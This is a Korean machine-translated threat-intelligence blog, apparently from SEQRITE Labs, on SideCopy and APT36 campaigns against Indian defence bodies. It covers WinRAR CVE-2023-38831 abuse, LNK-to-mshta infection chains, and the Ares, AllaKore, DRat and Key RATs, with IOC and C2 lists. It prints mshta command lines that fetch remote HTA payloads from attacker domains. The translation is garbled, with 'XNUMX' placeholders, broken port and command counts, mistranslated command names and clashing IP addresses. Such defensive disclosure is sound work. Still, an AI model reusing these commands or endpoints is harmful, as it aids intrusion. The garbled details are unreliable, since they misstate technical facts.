SEQRITE Labs APT-Team은 지난 몇 달 동안 인도 정부 및 국방 관련 기관을 표적으로 삼은 SideCopy APT 그룹의 여러 공격 캠페인을 발견했습니다. 이 위협 그룹은 최근 발견된 WinRAR 취약점을 악용하고 있습니다. CVE-2023-38831 (우리를 참조하십시오 자문 자세한 내용은 (AllaKore RAT, DRat 및 추가 페이로드를 배포하기 위해) SideCopy가 페이로드를 호스팅하는 데 사용하는 손상된 도메인은 여러 번 재사용되어 동일한 IP 주소로 연결됩니다. 또한, Ares RAT라는 오픈소스 에이전트의 Linux 버전을 배포했는데, 이 에이전트의 스테이저 페이로드에서 상위 위협 그룹인 Transparent Tribe(APT36)와 코드가 유사한 것으로 확인되었습니다. SideCopy와 APT36은 동일한 디코이와 명명 규칙을 사용하여 동시에 다중 플랫폼 공격을 수행하는 동시에 인프라와 코드를 공유하여 인도를 공격적으로 공격합니다.
이 블로그에서는 원격 측정 분석 중 발견된 두 가지 유사한 캠페인의 기술적 세부 사항을 자세히 살펴보겠습니다. 이스라엘-하마스 갈등이 심화됨에 따라 유사한 캠페인이 더 많이 발생하고 있으며, 파키스탄과 연계된 해커 활동가들뿐만 아니라 이스라엘에 반대하는 다른 단체들도 인도 웹사이트를 대상으로 DDoS, 변조, 데이터 유출 공격을 감행하고 있어 이러한 캠페인이 계속될 것으로 예상됩니다.
위협 행위자 프로필
SideCopy는 2019년 이후로 주로 인도 국방부와 아프가니스탄 정부 기관을 포함한 남아시아 국가를 표적으로 삼아 온 파키스탄 관련 고급 지속 위협 그룹입니다. 올해는 거의 매달 새로운 공격 캠페인이 원격 측정에서 관찰되었으며 추가 단계가 있는 시간이 지남에 따라 변경되었습니다. 더블 액션 RAT, 새로운 .NET 기반 RAT 및 PowerShell 원격 실행이 가능한 TTP 발견 저희 팀에서 개발했습니다. Action RAT, AllaKore RAT, Reverse RAT, Margulas RAT 등이 포함되어 있습니다.
이 그룹은 지속적으로 표적을 삼아온 Transparent Tribe(APT36)의 하위 부서로 연관되어 있습니다. 인도 군대 그리고 계속해서 타겟을 잡고 있습니다 대학생 올해는 학생 데이터를 테러 단체와 공유하여 신병 모집에 적극적으로 나섰습니다. 올해는 포세이돈을 비롯한 여러 유틸리티로 리눅스 악성코드를 업데이트했습니다. 2013년부터 활동해 온 이 악성코드는 Crimson RAT, Capra RAT, Oblique RAT 등의 페이로드를 지속적으로 공격에 사용해 왔습니다.
파키스탄 요원들은 허니트랩을 이용해 국방인력을 유인해, 이런 형태의 사이버 간첩 행위를 통해 기밀 정보를 훔쳐 엄청난 충격과 피해를 입혔습니다.
캠페인-1 분석
관찰된 첫 번째 SideCopy 캠페인은 "라는 이름의 아카이브 파일을 다운로드하는 피싱 링크를 통해 확산됩니다.동성애 – 인도군.”이 미끼 문서는 NSRO와 관련이 있으며 “ACR.pdf"또는"ACR_ICR_ECR_신규_정책_승인_양식.pdf."
그림 1 – 미끼 PDF
흥미롭게도 우리는 동일한 미끼 PDF가 Ares RAT의 Linux 변형에서도 사용된다는 것을 발견했습니다., 8월 마지막 주에 바이러스 토탈에서 처음 발견되었습니다. 아래 그림에서 볼 수 있듯이, 감염된 두 도메인 모두 동일한 IP 주소로 확인되었습니다. 4월에 사용된 도메인은ssynergy[.]in' 그리고 5월 '엘피인디아[.]닷컴' 캠페인 또한 동일한 IP를 가리킵니다. 더욱이, 서로 다른 도메인에 호스팅된 아카이브 파일의 이름이 동일하여 손상된 도메인을 재사용하고 있음을 시사합니다.
그림 2 – 동일한 IP를 사용한 감염 체인-1
Windows 플랫폼을 타겟으로 하는 피싱 URL은 다음을 가리킵니다. sunfireglobal[.]in, 이 글을 쓰는 시점에는 활성화되지 않은 손상된 도메인이 IP로 확인됩니다. 162.241.85[.]104. URL은 다음과 같습니다.
| hxxps://sunfireglobal[.]in/public/core/homo/동성애%20-%20인디언%20무장%20포스.zip |
여기에는 "동성애 - 인도군 ․pdf.lnk"라는 이름의 이중 확장자 형식의 악성 바로가기 파일이 포함되어 있으며, 이 파일은 다음과 같이 원격 HTA 파일을 트리거합니다.
| C:\Windows\System32\mshta.exe “hxxps://sunfireglobal[.]in/public/assests/files/db/acr/” && tar.exe |
여기에는 base64로 인코딩된 두 개의 내장 파일이 포함되어 있습니다. 하나는 가짜 PDF이고 다른 하나는 DLL입니다. HTA에서는 사소한 변경 사항만 관찰되었으며, .NET 버전 확인, 설치된 바이러스 백신 프로그램 가져오기, DLL 디코딩 및 메모리 내 실행 등 기능은 동일하게 유지됩니다.
DLL에 의해 디코이 파일이 열린 후 (프리보타), 동일한 도메인에 비컨을 보내고 HTA와 최종 DLL 콘텐츠를 대상 경로에 다운로드합니다. 다운로드된 HTA는 "seqrite. JPGTEMP 폴더에 저장된 후 대상 폴더로 이동하여 실행됩니다. 설치된 백신 프로그램에 따라 – SEQRITEQuick Heal, Kaspersky, Avast, Avira, Bitdefender 및 Windows Defender를 포함한 다양한 백신 프로그램에서 최종 DLL 페이로드를 실행합니다.
그림 3 – DLL preBotHta가 메모리 내에서 실행됨
자격 증명 마법사와 같은 합법적인 Windows 앱(credwiz.exe) 또는 EFS REKEY 마법사(rekeywiz.exe)는 DLL을 사이드로드하기 위해 대상 옆에 복사됩니다. 시스템 재부팅 시 최종 RAT 페이로드를 로드하기 위해 시작(또는 실행) 레지스트리 키를 통해 지속성이 유지됩니다. (Action RAT 및 기타 모든 페이로드에 대한 자세한 분석은 이전 문서에서 확인할 수 있습니다.) 백서)
같은 이름의 또 다른 압축 파일인 "Homosexuality – Indian Armed Forces.zip"이 발견되었는데, 이 파일에는 ELF 파일이 포함되어 있습니다. 이 파일은 "occoman[.]com,” 동일한 IP 주소로 확인 sunfireglobal[.].in, 손상된 도메인 간의 IP 공유를 보여줍니다.
그림 4 – 두 아카이브의 내용
PDF로 위장한 Golang 기반 Linux 맬웨어에 대한 다양한 파일 이름이 다음과 같이 발견되었습니다.
| 동성애 – 인도군 ․pdf | 2023-10-24 |
| 단위 훈련 프로그램 ․pdf | 2023-09-20 |
| 소셜 미디어 사용 ․pptx | 2023-08-30 |
활용 고리심 IDA 플러그인을 사용하면 바이너리가 제거되면서 함수 메타데이터를 추출할 수 있습니다(Go 기반에 대한 심층 분석 참조) 비뚤어지다 플러그인 세부 정보에 대한 맬웨어).
프로세스 흐름은 포세이돈 에이전트의 경우에서 볼 수 있는 첫 번째 단계와 유사합니다. 업틱 Zscaler) 정확한 대상 위치를 갖고 있지만 이 단계는 PyInstaller를 사용하여 컴파일되지 않았습니다.
- 현재 사용자 이름으로 시스템을 재부팅해도 지속성을 유지하기 위해 crontab을 만듭니다.
- 대상 디렉토리 "/.local/share"에 미끼를 다운로드하고 엽니다.
- Ares 에이전트를 “/.local/share/updates”로 다운로드하여 실행합니다.
그림 5 – 1단계 프로세스 흐름
최종 PyInstaller 페이로드의 내용을 추출한 후 관심 있는 두 개의 Python 컴파일 파일(agent.pyc config.pyc)을 검색합니다. 이를 디컴파일하고 검사하면 다음과 같은 오픈 소스 Python RAT가 생성됩니다. 아레스. 서버를 ping하는 데 사용되는 URL 형식은 다음과 같습니다.hxxps://(호스트)/api/(uid)/hello.” 그리고 여기에는 피해자 컴퓨터의 플랫폼, 호스트 이름, 사용자 이름이 포함됩니다. C13 통신을 위해 다음 2개의 명령을 지원합니다.
| Command | 기술설명 |
| 업로드 | 로컬 파일을 서버에 업로드합니다 |
| 다운로드 | HTTP(s)를 통해 파일을 다운로드합니다 |
| 지퍼 | 파일이나 폴더의 zip 아카이브를 생성합니다. |
| cd | 현재 디렉토리 변경 |
| 스크린 샷 | 스크린샷을 찍어 서버에 업로드합니다. |
| 파이썬 | Python 명령이나 Python 파일을 실행합니다. |
| 지속하다 | AutoStart 디렉토리를 통해 에이전트를 설치합니다. |
| 황어 무리 | 에이전트를 제거합니다 |
| 출구 | 에이전트를 죽인다 |
| 갈라진 금 | 지속성을 제거하고 에이전트를 종료합니다. |
| 목록 | 파일 디렉토리를 나열하고 서버에 업로드합니다. |
| 도움 | 도움말 표시 |
| 쉘 명령을 실행하고 출력을 반환합니다. |
에이전트의 이름을 변경한 것 외에는 큰 변화가 관찰되지 않았습니다. 아르 에 gedit그리고 에이전트에서 사용하는 서버는 구성 파일에 있습니다: 161.97.151[.]200:7015. 에이전트와 구성 스크립트 모두에 '라는 이름이 포함되어 있습니다.리' 에서 언급된 것과 동일한 에이전트를 가리킴 루멘.
그림 6 – 구성 파일
그림 7 – 에이전트 스크립트
이 탑재물은 또한 "보스 업데이트,"포세이돈과 Transparent Tribe의 다른 유틸리티에서 볼 수 있는 유사한 명명 규칙으로, 'boss' 접두사로 시작합니다. APT36은 인도 정부 기관을 위해 개발된 운영체제 BOSS를 노리고 있으며, 리눅스 무기고를 지속적으로 확장하고 있습니다. 2021년, SideCopy는 QiAnXin의 레드 레인드롭 팀 그리고 포크 버전이라고 불리는 백넷 by 텔시 나중에.
캠페인-2 분석
두 번째 캠페인은 침해된 도메인뿐만 아니라 C2 인프라와도 IP 공유가 발생하는 동일한 시나리오를 가지고 있습니다. 최근 WinRAR 취약점인 CVE-2023-38831은 악성 아카이브 파일을 다운로드하는 피싱 공격을 통해 악용됩니다. 아카이브 파일을 열면 동일한 이름의 PDF 파일과 폴더가 나타납니다.
그림 8 – WinRAR 활용에 사용되는 아카이브
PDF를 열면 취약점이 발생하여 폴더 내부의 페이로드가 조용히 시작됩니다. ShellExecute WinRAR 애플리케이션의 기능입니다. 미끼 PDF는 '인도 전역 비공보 공무원 협회(AIANGOs)는 인도 국방부에 평화 시위 프로그램을 언급했습니다. 뭄바이에 본부를 둔 AIANGOs는 2000년 CCS(RSA) 규정 1993에 따라 인도 정부와 국방부로부터 인정을 받았으며, X(트위터) 페이지에 언급된 바와 같이 CDRA에 소속되어 있습니다.
그림 9 – WinRAR 공격에 사용되는 미끼
폴더에 존재하는 페이로드는 AllaKore RAT 에이전트로, 시스템 정보 탈취, 키로깅, 스크린샷 촬영, 파일 업로드 및 다운로드, 피해자 컴퓨터의 원격 접근 권한을 획득하여 명령을 전송하고 탈취한 데이터를 C2에 업로드하는 기능을 가지고 있습니다. 또한, 아래에 설명된 바와 같이, 사용된 C2와 이전 캠페인과의 연결도 더 많이 이루어졌습니다.
그림 10 – 도메인 및 C2와 IP 공유를 통한 감염 체인-2
상관관계
- SideCopy의 유사한 공격 체인은 미끼 문서 "에서 관찰됩니다.DocScanner-10월국방부 사우디 대표단을 지칭합니다. 동일한 미끼가 SideCopy와 APT36이 각각 XNUMX월과 XNUMX월에 실시한 작전에서 사용된 것으로 확인되었습니다.
- 이 체인의 손상된 도메인은 'rockwellroyalhomes[.]com'는 동일한 IP로 확인됩니다. 103.76.213[.]95 도메인과 함께 사용됨 '아이소메트릭인디아[.]코인,'는 8월에 "미국 대 중국 무역 전쟁"이라는 주제로 캠페인을 벌이는 데 사용된 것으로 관찰되었습니다.
- 최종 페이로드 DRat가 IP와 연결됩니다. 38.242.149[.]89 AllaKore RAT와 함께 사용되는 C2 통신용입니다.
- 유사한 피싱 URL이 동일한 "록웰로열홈스” 도메인, 유사한 이름 “DocScanner_AUG_2023.zip.”이것은 IP를 갖는 C2에 연결되는 또 다른 Ares RAT 샘플로 이어집니다. 38.242.220[.]166:9012, 미끼가 다시 인도 국방부를 가리키고 있는 곳의회 문제."
그림 8 – Ares RAT와 함께 사용되는 미끼
피싱 URL은 다음을 가리킵니다. rockwellroyalhomes[.]com, IP로 확인되는 손상된 도메인: 103.76.231[.]95
| hxxps://www.rockwellroyalhomes.com/js/FL/DocScanner-Oct.zip |
여기에는 "DocScanner-Oct.zip․pdf.lnk"라는 이중 확장자 형식의 악성 바로가기 파일이 포함되어 있으며, 이 파일은 다음과 같이 원격 HTA 파일을 트리거합니다.
| C:\Windows\System32\mshta.exe hxxps://www.rockwellroyalhomes.com/js/content/ 및 mshta.exe |
여기에는 base64로 인코딩된 임베디드 파일이 포함되어 있으며, 이는 가짜 PDF, DLL, EXE 파일입니다. 피해자 컴퓨터에 설치된 바이러스 백신 프로그램도 유사한 검사를 거친 후, 가짜 파일을 열고 최종 파일을 삭제합니다. 드랏 PDB 경로에서 명명된 새로운 원격 액세스 트로이 목마인 페이로드:
| d:\Projects\C#\D-Rat\DRat 클라이언트\Tenure\obj\Release\MSEclipse.pdb |
지원되는 13개 명령의 기능은 다음과 같습니다.
| 디코딩된 명령 | 기능 |
| 겟인포미티카 | 시스템 정보 보내기 - 사용자 및 OS 이름, 타임스탬프, 시작 경로 |
| 저녁을 먹다 | '를 보내다확인하다' 명령을 받기 시작하라는 메시지 |
| 가까운 | '를 보내다폐쇄' 연결을 닫고 종료하라는 메시지 |
| 카민디나 | 실행 상태 확인 |
| 델 | 특정 디렉토리(또는) 파일을 삭제하고 확인을 보냅니다. |
| enterPath | 특정 디렉토리를 입력하고 각 파일 및 하위 폴더에 대한 속성을 보냅니다. |
| 백패스 | 현재 작업 디렉토리 보내기 |
| 드라이브 목록 | 다음을 사용하여 디스크 정보 및 DeviceID를 가져옵니다.
|
| fdl | 파일 속성 업로드 |
| fdIConfirm | 파일을 업로드 |
| FUP | 파일 다운로드 |
| 퓨펙섹 | 다운로드 및 실행 (1) |
| 최고경영자 | 다운로드 및 실행 (2) |
그림 8 – DRat를 사용한 미끼 재사용
Windows와 Linux 플랫폼을 동시에 공격하는 유사한 또 다른 캠페인이 발견되었습니다. 이 경우, Key RAT이라는 Windows용 새로운 페이로드가 Ares RAT와 함께 배포됩니다. 이 세 번째 캠페인의 IOC는 마지막 부분에 포함되어 있습니다.
C2 인프라 및 도메인
모든 C2 서버는 독일의 Contabo GmbH에 등록되어 있으며, 파키스탄과 연관된 두 APT에서 공통적으로 사용됩니다.
| 38.242.149[.]89 | vmi1433024.contaboserver.net | AllaKore RAT 및 DRat |
| 207.180.192[.]77 | vmi747785.contaboserver.net | 키 RAT |
| 38.242.220[.]166 | vmi1390334.contaboserver.net | 아레스 랫 |
| 161.97.151[.]220 | vmi1370228.contaboserver.net | 아레스 랫 |
여러 미끼와 연결된 Ares의 한 서버는 C9012 통신을 위해 포트 2에서 pfsense 방화벽을 실행하고 있습니다. 38.242.220[.]166.
그림 9 – Ares 서버 세부 정보
그림 10 – Ares 서버의 pfsense 로그인 페이지
올해 SideCopy가 사용한 모든 손상된 도메인은 다음과 같습니다. 에서 GoDaddy 등록관으로서 HostGator에 서버 이름입니다. Whois 정보는 다음과 같습니다.
| IP | 도메인 | 운동 | 등록자 |
| 103.76.213[.]95
조직: Spectra Technologies ISP: CtrlS 델리, 인도 – AS18229 |
아이소메트릭인디아[.]코인 | XNUMX 월 | 오자네라 주식회사, 뭄바이 |
| rockwellroyalhomes[.]com | XNUMX 월 | 템피, 애리조나, 미국 | |
| 162.241.85[.]104
Org & ISP: 통합 계층 미국 유타주 프로보 – AS46606 |
sunfireglobal[.]in | XNUMX 월 | 서 벵골, 인도 |
| occoman[.]com | XNUMX 월 | 템피, 애리조나, 미국 | |
| 엘피인디아[.]닷컴 | 5월 | 템피, 애리조나, 미국 | |
| ssynergy[.]in | 4월 | 서 벵골, 인도 |
우리는 기계 이름을 보았습니다.데스크탑-g4b6mh4' 올해 엄청난 수의 바로가기 파일과 관련된 것으로 나타났습니다. 이는 이러한 캠페인에서만 발견되는 것이 아니라, 위협 행위자가 새로운 캠페인을 사용하기도 했습니다.
- 데스크탑-87p7en5
- 데스크탑-ey8nc5b
결론 및 귀속
제로데이 취약점을 악용하여 무기고를 확장하는 SideCopy는 다양한 원격 접속 트로이목마를 통해 인도 방위 기관을 지속적으로 공격하고 있습니다. 공격 체인, 대상 선정, 사용된 미끼, 인프라 등을 고려할 때, 이러한 캠페인은 SideCopy의 소행으로 추정됩니다. APT36은 Linux 무기고를 지속적으로 확장하고 있으며, SideCopy와 Linux 스테이징을 공유하여 Ares라는 오픈소스 Python RAT을 배포하는 것으로 관찰되었습니다. 동시에, 여러 인도 도시에서 이 캠페인에 대한 원격 측정 공격이 관찰되었는데, 이는 이스라엘-하마스 분쟁 속에서 활동이 증가했음을 보여줍니다. 전반적으로, 이러한 캠페인과 추가적인 캠페인 모두 밀접하게 연관된 위협 그룹 간의 코드 및 인프라 공유와 관련이 있습니다.
SEQRITE 보호
| LNK.Trojan.48283.GC | 사이드카피.트로이.48284.GC | JS.트로이 목마.47685 |
| LNK.Dropper.47686.GC | 사이드카피.트로이.48285.GC | JS.사이드카피.47539.GC |
| LNK.사이드카피.47538.GC | 트로이 목마.사이드카피.S30112863 | JS.사이드카피.47540 |
| ELF.에이전트.48298.GC | 트로이 목마.사이드카피.S30112905 | JS.SideCopy.42911 |
| ELF.에이전트.48286.GC | 트로이 목마.사이드카피.S30112904 | 트로이 목마.사이드카피 |
| 스크립트.트로이.47763 | 트로이 목마 APT.SideCopy.PB1 |
취해야 할 예방 조치
다음과 같은 예방 조치를 취하면 이러한 심각한 사이버 공격으로부터 보호받을 수 있습니다.
- 알 수 없는 출처의 검증되지 않은 링크는 클릭하지 마세요.
- 첨부 파일, 특히 보관 파일은 다운로드하거나 열지 마세요.
- endpoint protection 끊임없이 변화하는 위협 환경 속에서 앞서나가기 위해서입니다.
- 알려진 취약점을 수정하려면 OS와 소프트웨어 앱을 정기적으로 업데이트하세요.
- 기밀 문서와 민감한 정보에 암호 보호를 추가합니다.
IOC
Windows
| 아카이브 | |
| eb07a0063132e33c66d0984266afb8ae | DocScanner-Oct.zip |
| 8bee417262cf81bc45646da357541036 | 동성애 – 인도군.zip |
| 9e9f93304c8d77c9473de475545bbc23 | DMA의 업적.rar |
| 9379ebf1a732bfb1f4f8915dbb82ca56 | Agenda_Points_Ammended.rar |
| 49b29596c81892f8fff321ff8d64105a | DMA_월간_업데이트_회의_분_정식.zip |
| 단축키(LNK) | |
| 75f9d86638c8634620f02370c28b8ebd | DocScanner-10월.pdf.lnk |
| fc5eae3562c9dbf215384ddaf0ce3b03 | 동성애 - 인도군.pdf.lnk |
| a52d2a0edccdc0f533c7b04e88fe8092 | 아젠다_포인트.docx.lnk
draft_short_PPT.pptx.lnk 회의_요약.pdf.lnk |
| HTA | |
| 02c444c5c1ad25e6823457705e8820bc | msfnt.hta |
| d6e214fd81e7afb57ea77b79f8ff1d45 | p.hta |
| d0c80705be2bc778c7030aae1087f96e | 메인.hta |
| DLL | |
| 31340EA400E6611486D5E57F0FAB5AF2 | SummitOfBion.dll |
| FE0250AF25C625E24608D8594B716ECB | preBotHta.dll |
| C872F21B06C4613954FFC0676C1092E3 | WinGfx.dll |
| 쥐 | |
| ff13b07eaabf984900e88657f5d193e6 | Msfront.exe(DRat) |
| 6f37dacf81af574f1c8a310c592df63f | Achievements_of_DMA.pdf .exe (AllaKore RAT) |
| 9f5354dcf6e6b5acd4213d9ff77ce07c | steistem.exe / Onlyme.exe(키 RAT) |
| 미끼 | |
| CCB6723C14EBB0A12395668377CF3F7A | DocScanner-10월.pdf |
| acec2107d4839fbb04defbe376ac4973 | DMA_성과.pdf_ |
| f759b6581367db35e3978125f4f6ff80 | ACR.pdf |
| 기타 | |
| B6FBCAE7980D4E02CE9ED9876717F385 | 캐시.bat |
| 4f541ec8cd238737e4e77a55fbcbb4f3 | 디.txt |
| PDB | |
| d:\Projects\C#\D-Rat\DRat 클라이언트\Tenure\obj\Release\MSEclipse.pdb | |
| C:\Users\Boss\Desktop\test\Client\Client\obj\Release\Onlyme.pdb | |
Linux
| 아카이브 | |
| 7cba23cfd9587211e7a214a88589cf25 | DocScanner_AUG_2023.zip |
| 04a65069054085cd81daabe4fc15ce76 | 동성애 – 인도군.zip |
| c61b19cbedcb878aff45c067d503d556 | 회의 세부 정보.zip |
| eccc72deb8ce41433ed13591b4557343 | DMA_월간_업데이트_회의_분_정식.zip |
| 스테이저 | |
| 9375e3c13c85990822d2f09a66b551d9 | DocScanner_2023월_XNUMX.pdf |
| 42a696ef6f7acf0919fea9748029a966 | 동성애 – 인도군 ․pdf |
| 54473E0D8CAFD950AFE32DE1A2F3A508 | DocScanner_업데이트_레터․pdf |
| 36933B05B7E3060955E6A1FDFD7D8EC1 | 2023년 XNUMX월 초안·docx |
| 508F4BFAD9F2482992AC7926910BD551 | 업데이트된 초안 PPT․pptx |
| 921915ecfe17593476648ad20cd61ecd | 회의_공지-reg․pdf |
| 미끼 | |
| 5e32703e3704b2b5c299c242713b1ec5 | DocScanner_2023월_XNUMX.pdf |
| f759b6581367db35e3978125f4f6ff80 | ACR.pdf |
| af3ec4f8a072779eb0cac18eaafc256d | 회의공지-reg.pdf |
| 0799e17933b875e3a54f01416e7505d5 | DocScanner_업데이트_레터.pdf |
| b4854c420bc39c8c77a0fcd9395a8748 | 2023년 XNUMX월_초안_편지.docx |
| 4cd0ee8186dc4203aad0cba48a8e5778 | 업데이트된 초안 PPT.pptx |
| 아레스 랫 | |
| 088b89698b122454666e542b1e1d92a4 | 보스 업데이트 |
| b992b03b0942658a516439b56afbf41a | 업데이트 |
| ebbc1c4fc617cda7a0b341b12f45d2ad | 업데이트 |
C2 및 도메인
| 38.242.149[.]89:61101 | 알라코어 RAT |
| 38.242.149[.]89:9828 | 드랏 |
| 38.242.220[.]166:9012
161.97.151[.]220:7015 |
아레스 랫 |
| 207.180.192[.]77:6023 | 키 RAT |
| 162.241.85[.]104 | sunfireglobal[.]in
occoman[.]com 엘피인디아[.]닷컴 ssynergy[.]in |
| 103.76.213[.]95 | rockwellroyalhomes[.]com
아이소메트릭인디아[.]코인 |
URL이
| hxxps://www.rockwellroyalhomes[.]com/js/FL/DocScanner-Oct.zip |
| hxxps://www.rockwellroyalhomes[.]com/js/content/msfnt.hta |
| hxxps://www.rockwellroyalhomes[.]com/js/content/2023-06-21-0056.pdf |
| hxxps://www.rockwellroyalhomes[.]com/js/content/ |
| hxxps://www.rockwellroyalhomes[.]com/js/FL/2023-06-21-0056.pdf |
| hxxps://www.rockwellroyalhomes[.]com/crm/asset/css/files/file/ |
| hxxps://www.rockwellroyalhomes[.]com/crm/asset/css/files/doc/ |
| hxxps://www.rockwellroyalhomes[.]com/crm/asset/css/files/doc/DocScanner_AUG_2023.zip |
| hxxps://sunfireglobal[.]in/public/core/homo/ |
| hxxps://sunfireglobal[.]in/public/assests/files/db/acr/ |
| hxxps://sunfireglobal[.]in/public/assests/files/auth/av |
| hxxps://sunfireglobal[.]in/public/assests/files/auth/dl |
| hxxps://sunfireglobal[.]in/public/assests/files/auth/ht |
| hxxps://occoman[.]com/wp-admin/css/colors/ocean/files/files/tls |
| hxxps://occoman[.]com/wp-admin/css/colors/ocean/files/files/ |
| hxxps://occoman[.]com/wp-admin/css/colors/ocean/files/pdf/in |
| hxxps://occoman[.]com/wp-admin/css/colors/ocean/files/files/bossupdate |
| hxxps://futureuniform[.]ca/wp/wp-content/files/01/main.hta |
| hxxps://futureuniform[.]ca/email.gov.in/briefcase/Meeting_Notice-reg.pdf |
| hxxps://futureuniform[.]ca/mail.gov.in/briefcase/updated_draft_PPT.pptx |
| hxxps://futureuniform[.]ca/mail.gov.in/briefcase/draft_letter_nov_2023.docx |
| hxxps://futureuniform[.]ca/mail.gov.in/briefcase/DocScanner_Updated_letter.pdf |
| hxxps://keziaschool[.]com/wp/wp-content/uploads/2023/files/bossupdate |
| hxxps://keziaschool[.]com/wp/wp-content/uploads/2023/38 |
| hxxp://38.242.220[.]166:9012/api/root_149371139681480/업로드 |
| hxxp://38.242.220[.]166:9012/api/root_149371139681480/안녕하세요 |
| hxxp://38.242.220[.]166:9012/api/root_168683512566649/업로드 |
| hxxp://38.242.220[.]166:9012/api/root_168683512566649/안녕하세요 |
| hxxp://38.242.220[.]166:9012/api/root_175170531258512/업로드 |
| hxxp://38.242.220[.]166:9012/api/root_175170531258512/안녕하세요 |
| hxxp://161.97.151[.]220:7015/api/root_36854582802642/업로드 |
| hxxp://161.97.151[.]220:7015/api/root_36854582802642/안녕하세요 |
주인
| C:\Users\Public\aque\up.hta |
| C:\Users\Public\aque\cdrzip.exe |
| C:\Users\Public\aque\rekeywiz.exe |
| C:\Users\Public\aque\DUser.dll |
| C:\Users\Public\aque\data.bat |
| C:\Users\Public\Msfront\Msfront.exe |
| C:\Users\Public\winowimg.jpg |
| C:\Users\Public\stremoe\steistem.exe |
| C:\Users\Public\stremoe\stremoe.bat |
| C:\ProgramData\Intel\cdrzip.exe |
| C:\ProgramData\Intel\DUser.dll |
| C:\ProgramData\WinGfx\credwiz.exe |
| C:\ProgramData\WinGfx\wingfx.bat |
| C:\ProgramData\WinGfx\DUser.dll |
| C:\ProgramData\HP\jquery.hta |
| C:\ProgramData\HP\jscy.hta |
| %AppData%\Msfront\Msfront.exe |
| %AppData%\Msfront\DUser.dll |
| %AppData%\Msfront\crezly.exe |
| %Temp%\cache.bat |
| %Temp%\Msfont\Msfont.exe |
MITER ATT & CK
| 술책 | 기술 ID | 이름 |
| 자원 개발 | T1583.001
T1584.001 T1588.001 T1588.002 T1608.001 T1608.005 |
인프라 획득: 도메인
침해 인프라: 도메인 기능 획득: 멀웨어 능력 획득: 도구 단계 기능: 맬웨어 업로드 스테이지 기능: 링크 대상 |
| 초기 액세스 | T1566.001
T1566.002 |
피싱: 스피어 피싱 첨부 파일
피싱: 스피어 피싱 링크 |
| 실행 | T1106
T1129 T1059 T1047 T1203 T1204.001 T1204.002 |
네이티브 API
공유 모듈 명령 및 스크립팅 해석기 윈도우 관리 계장 클라이언트 실행을 위한 악용 사용자 실행: 악성 링크 사용자 실행: 악성 파일 |
| 고집 | T1053.003
T1547.001 T1547.013 |
예약된 작업/작업: Cron
레지스트리 실행 키/시작 폴더 부팅 또는 로그온 자동 시작 실행: XDG 자동 시작 항목 |
| 방어 회피 | T1036.005
T1140 T1218.005 T1574.002 T1222.002 T1027.009 T1027.010 |
가장 무도회: 적법한 이름 또는 위치 일치
파일 또는 정보의 난독화/디코드 시스템 바이너리 프록시 실행: Mshta 하이재킹 실행 흐름: DLL 사이드 로딩 파일 및 디렉터리 권한 수정: Linux 난독화된 파일 또는 정보: 임베디드 페이로드 난독화된 파일 또는 정보: 명령 난독화 |
| 발견 | T1012
T1033 T1057 T1082 T1083 T1016.001 T1518.001 |
쿼리 레지스트리
시스템 소유자/사용자 검색 프로세스 발견 시스템 정보 검색 파일 및 디렉토리 검색 시스템 네트워크 구성 검색 소프트웨어 검색: 보안 소프트웨어 검색 |
| 수집 | T1005
T1056.001 T1074.001 T1119 T1113 T1125 |
로컬 시스템의 데이터
입력 캡처: 키로깅 데이터 스테이징: 로컬 데이터 스테이징 자동 수집 화면 캡처 비디오 캡처 |
| 명령 및 제어 | T1105
T1571 T1573 T1071.001 |
인그레스 도구 전송
비표준 포트 암호화된 채널 애플리케이션 계층 프로토콜: 웹 프로토콜 |
| 여과 | T1041 | C2 채널을 통한 유출 |
